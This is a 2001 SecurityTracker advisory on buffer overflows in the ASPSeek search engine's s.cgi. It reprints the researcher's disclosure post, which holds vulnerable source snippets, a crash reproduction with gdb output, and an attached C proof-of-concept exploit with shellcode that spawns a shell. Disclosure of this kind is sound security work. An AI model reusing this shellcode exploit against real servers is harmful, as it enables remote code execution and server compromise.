SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   ASPSeek Vendors:   SWsoft
ASPSeek CGI-based Search Engine May Execute Arbitrary Code Supplied By Remote Users
SecurityTracker Alert ID:  1001115
SecurityTracker URL:  http://securitytracker.com/id/1001115
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 19 2001
Impact:   Execution of arbitrary code via network
Fix Available:  Yes  
Version(s): v1.0.0 through v1.0.3
Description:   There is a vulnerability in the ASPSeek search engine cgi code, as reported today. This buffer overflow vulnerability allows remote users to execute code on the server.

ASPSeek is a cgi-based compiled search engines that uses a MySQL database as its data store. The "s.cgi" code performs input and output for the search engine, but does not properly parse the user-defined data. There are reportedly multiple buffer overflow conditions in s.cgi. Additional details are provided in the original source message.

Impact:   A remote user could send an improperly formatted request to the "s.cgi" search engine cgi that causes the server to execute arbitrary code, which could be used to grant the user a shell with the privileges of the web server (typically "nobody" privileges).
Solution:   The vendor apparently provides a patch.
Vendor URL:  www.aspseek.org (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (FreeBSD)

Message History:   None.


 Source Message Contents

Subject:  Aspseek Buffer Overflow


This is a multi-part message in MIME format.

------=_NextPart_000_0064_01C0B016.7ABAB780
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

|---------------------------------------------------------------------------------------|
/    Product: Aspseek Search Engine.                                                                            /
\    Vendor URL: www.aspseek.org                                                                             \
/    Tested on: v1.0.0 -> v1.0.3 [Freeware] Linux                                                         /
\    Vendor Contact: Mailed on 8th March NO Reply Vendor Patched though              \
/                                                                                                                                
  /
|-- The Problem, ----------------------------------------------------------------------|
                The Aspseek Search Engine is like many other C/C++ Compiled search
engines, and uses a MySQL database as its data store.

     "Our stable releases are really stable" - aspseek development team

-Overview,
                Once compiled and properly setup, you are left to copy s.cgi to the cgi-bin
of your webserver. This script acts as the input and output for the search engine,
taking user defined data and outputs the search results. Unfortunately there is a
problem in the parsing of user defined data.

-/Overview

-Detail,
                There are multiple buffer overflow conditions in s.cgi, the first being the
most obvious:

1.
         sc.cpp:
             int search(char *exe, char *arg) {
             ==>
                if ((env = getenv("QUERY_STRING")))
               {
                   strcpy(query_string, env);
                   ....
               }
             <==
             }

             Where query_string is defined as: query_string[STRSIZ] = query_string[4 x 1024]

             Through experimentation i found that it would take at least 10272 chars to
             overflow this buffer, therefore making it useless remotely. Since Apache by
             default will only take a URI of 8190 bytes length.

2.
         templates.cpp:
             int CCgiQuery::ParseCgiQuery(char* query, char* templ) {
             ==>
                  else if ((!STRNCMP(token, "tmpl="))
                  {
                       char* tmpl = token + 5;
                       char tmplu[2000];
                       sprintf(tmplu, "&tmpl=%s", tmpl);
                       ....
                  }
            <==
            }

             The above condition is a classic buffer overflow, i found that the buffer can
             be overflowed with 5148 bytes of data. Therefore making this remotely
             exploitable.

             Example,

             [root@linux cgi-bin]# export QUERY_STRING="q=a&tmpl=`perl -e'printf("a"x5200)'`"
             [root@linux cgi-bin]# ./s.cgi

             Content-type: text/html

             <html><body>Can't open template file 'aaaaa...............'!</body></html>
             Segmentation Fault (core dumped)

             [root@linux cgi-bin]# gdb s.cgi core

             GNU gdb 5.0
             Copyright 2000 Free Software Foundation, Inc.
             GDB is free software, covered by the GNU General Public License, and you are
             welcome to change it and/or distribute copies of it under certain conditions.
             Type "show copying" to see the conditions.
             There is absolutely no warranty for GDB.  Type "show warranty" for details.
             This GDB was configured as "i386-asplinux-linux"...
             Core was generated by `./s.cgi'.
             Program terminated with signal 11, Segmentation fault.

             #0  0x61616161 in ?? ()

-/Detail

|-- Exploit, ----------------------------------------------------------------------------|
                To demonstrate the problem i have supplied a Local exploit which
simply drops s.cgi to a shell. This condition is exploitable remotely and could be
used to obtain a remote uid=nobody shell.

|-- Solution, ---------------------------------------------------------------------------|
             Vendor provides a patch @ aspseek.org, strange though i got no reply??

|-- Credits, ---------------------------------------------------------------------------|

        Asp Group -  producers of Asplinux & Aspseek, for making Asplinux the
                             wierdest distro i have ever used.
        mjm   - muench@gmc-online.de, the fastest mail replier ever :)
        all @alldas.de
_________________________________________________________________

NeilK (neil@alldas.de/neilk@alldas.de)
www.alldas.de

             "Regulation of Investigatory Powers Act (RIP)
                     Communism in the UK since Oct 2000"
                                            http://www.stand.org.uk



------=_NextPart_000_0064_01C0B016.7ABAB780
Content-Type: application/octet-stream;
	name="aspseek-xploit.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="aspseek-xploit.c"

/*=0A=
 * Aspseek v1.0.0 - 1.0.3 -Proof of Concept eXploit-=0A=
 * Tested on Redhat 7.0, Asplinux RC3 (v1.1)=0A=
 *=0A=
 * by:  NeilK (neilk@alldas.de/neil@alldas.de)=0A=
 *	http://neilk.alldas.de=0A=
 *=0A=
 * 	Local proof of concept buffer overflow exploit for s.cgi=0A=
 *	its not suid/sgid but it can be remote :)=0A=
 *=0A=
 *	Line #1228 - templates.cpp=0A=
 *		char* tmpl =3D token + 5;=0A=
 *		char tmplu[2000];=0A=
 *		sprintf(tmplu, "&tmpl=3D%s", tmpl)=0A=
 *=0A=
 * greetz: mjm, all @alldas.de=0A=
 */=0A=
=0A=
#include <stdio.h>=0A=
#include <string.h>=0A=
#include <stdlib.h>=0A=
=0A=
#define NOP 0x90=0A=
#define BUFSIZE 5148=0A=
#define OFFSET -200=0A=
#define RETURNS 2=0A=
 =0A=
unsigned char shellcode[] =3D=0A=
	=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3=
\x8d"=0A=
	=
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68=
\x58";=0A=
=0A=
long get_sp () { __asm__ ("mov %esp, %eax"); }=0A=
=0A=
int=0A=
main (int argc, char *argv[])=0A=
{=0A=
	char buffer[BUFSIZE];=0A=
	int i, offset;=0A=
	unsigned long ret;=0A=
=0A=
	fprintf(stderr, "Aspseek v1.0.3 -Proof of Concept eXploit-\n");=0A=
	fprintf(stderr, "by neilk@alldas.de/neil@alldas.de\n");=0A=
=0A=
	if (argc > 1)=0A=
    		offset =3D atoi(argv[1]);=0A=
  	else=0A=
    		offset =3D OFFSET;=0A=
  =0A=
  	memcpy(buffer, "q=3Da&tmpl=3D", 9);=0A=
  	for (i =3D 9; i < (BUFSIZE - strlen(shellcode) - (RETURNS*4)); i++)=0A=
    		*(buffer + i) =3D NOP;=0A=
=0A=
  	memcpy (buffer + i, shellcode, strlen(shellcode));=0A=
=0A=
  	ret =3D get_sp();=0A=
=0A=
  	for (i =3D BUFSIZE - (RETURNS*4); i < BUFSIZE; i +=3D 4)=0A=
    		*(long *) &buffer[i] =3D ret+offset;=0A=
=0A=
  	buffer[BUFSIZE] =3D '\0';=0A=
=0A=
  	fprintf(stderr, "[return address =3D %p] [offset =3D %d] [buffer size =
=3D %d]\n", ret + offset, offset, strlen(buffer));=0A=
 =0A=
  	setenv("QUERY_STRING", buffer, 1);=0A=
  =0A=
  	execl("./s.cgi", "s.cgi", NULL);=0A=
  	exit(1);=0A=
}=0A=

------=_NextPart_000_0064_01C0B016.7ABAB780--


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC